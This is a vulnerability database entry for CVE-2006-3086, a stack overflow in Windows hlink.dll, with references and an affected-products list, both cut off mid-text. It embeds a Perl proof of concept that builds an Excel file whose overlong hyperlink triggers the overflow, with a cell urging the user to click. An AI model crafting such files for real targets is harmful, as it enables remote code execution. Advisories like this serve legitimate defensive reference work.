Microsoft HLINK.DLL Link Stack Overflow Vulnerability

Vulnerability ID: 1110474
Vulnerability type: Buffer overflow
Published: 2006-06-18
Updated: 2006-08-09
CVE ID: CVE-2006-3086
CNNVD-ID: CNNVD-200606-375
Platform: Windows
CVSS score: 9.3
|Vulnerability source
https://www.exploit-db.com/exploits/1927
https://www.securityfocus.com/bid/18500
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200606-375
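|Vulnerability details
Microsoft Windows is a series of operating systems released by Microsoft Corporation of the United States. hlink.dll in Microsoft Windows has a stack overflow vulnerability when processing hyperlinks. An attacker can exploit this vulnerability by constructing a malicious hyperlink. If a user clicks a malicious link in a website, Office file, or e-mail, remote code execution may result. An attacker who successfully exploits this vulnerability can take complete control of the affected system. Exploiting this vulnerability requires user interaction.
|Exploit (EXP)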
###############################
# excelsexywarez.pl
# excel unicode overflow poc
# by kcope in 2006
# thanks to revoguard and alex
###############################
use Spreadsheet::WriteExcel;

   my $workbook = Spreadsheet::WriteExcel->new("FUCK.xls");

   $worksheet = $workbook->add_worksheet();

   $format = $workbook->add_format();
   $format->set_bold();
   $format->set_color('red');
   $format->set_align('center');

   $col = $row = 5;
   $worksheet->write($row, $col, "kcope in da house! Click on the link!!!", $format);

   $a="AAAAAAAAAAAAAAAAAAAAAA\\" x 500;
   $worksheet->write_url(0, 0, "$a", "LINK");

# milw0rm.com [2006-06-18]
|Affected products
Microsoft Windows XP Tablet PC Edition SP2
Microsoft Windows XP Tablet PC Edition SP1
Microsoft Windows XP Tablet PC Edition
Microsoft Windows XP Professional x64 Edition
Microsoft Wind
|References

Source: US-CERT
Name: VU#394444
Link: http://www.kb.cert.org/vuls/id/394444
Source: MISC
Link: http://www.tippingpoint.com/security/advisories/TSRT-06-10.html
Source: BUGTRAQ
Name: 20060808 TSRT-06-10: Microsoft HLINK.DLL Hyperlink Object Library Buffer Overflow Vulnerability
Link: http://www.securityfocus.com/archive/1/archive/1/442724/100/0/threaded
Source: VUPEN
Name: ADV-2006-2431
Link: http://www.frsirt.com/english/advisories/2006/2431
Source: SECTRACK
Name: 1016339
Link: http://securitytracker.com/id?1016339
Source: SECUNIA
Name: 20748
Link: http://secunia.com/advisories/20748
Source: XF
Name: excel-hlink-bo(27224)
Link: http://xforce.iss.net/xforce/xfdb/27224
Source: BID
Name: 18500
Link: http://www.securityfocus.com/bid/18500
Source: BUGTRAQ
Name: 20060623 Re: MS Excel Remote Code Execution POC Exploit
Link: http://www.securityfocus.com/archive/1/archive/1/438373/100/0/threaded
Source: BUGTRAQ
Name: 20060623 Re: Re: MS Excel Remote Code Execution POC Exploit
Link: http://www.securityfocus.com/archive/1/archive/1/438156/100/0/threaded
Source: BUGTRAQ
Name: 20060622 Re: MS Excel Remote Code Execution POC Exploit
Link: http://www.secu